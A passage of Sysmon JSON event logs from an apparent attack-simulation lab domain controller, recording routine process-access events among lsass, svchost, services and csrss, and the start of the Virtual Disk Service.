C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1265,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1266,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.965\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.965","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1267,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.971\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-0010A7E40200}\r\nProcessId: 3420\r\nImage: C:\\Windows\\System32\\vds.exe\r\nFileVersion: 10.0.14393.2608 (rs1_release.181024-1742)\r\nDescription: Virtual Disk Service\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: vds.exe\r\nCommandLine: C:\\Windows\\System32\\vds.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5\r\nParentProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nParentProcessId: 856\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.971","ProcessGuid":"{A837DB8D-01C5-5F25-0000-0010A7E40200}","Image":"C:\\Windows\\System32\\vds.exe","FileVersion":"10.0.14393.2608 (rs1_release.181024-1742)","Description":"Virtual Disk Service","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"vds.exe","CommandLine":"C:\\Windows\\System32\\vds.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=EC0D95737DE497BA0AD2223322B21280,SHA256=DE976B547872B0919E16D5A97902B95893AD5B76DE6A11BE5F874EADBCA49F93,IMPHASH=3F541E0A1D775ACA4A7D5FBDFF8433C5","ParentProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","ParentProcessId":"856","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1268,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.987\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 944\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7E40200}\r\nTargetProcessId: 3420\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.987","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"944","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7E40200}","TargetProcessId":"3420","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|C:\\Windows\\system32\\services.exe+12939|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+4c6c|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1269,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.987\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-0010A7E40200}\r\nTargetProcessId: 3420\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.987","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-0010A7E40200}","TargetProcessId":"3420","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1270,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.993\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.993","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1271,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.993\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.993","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1272,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.996\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 924\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001066B80200}\r\nTargetProcessId: 2748\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 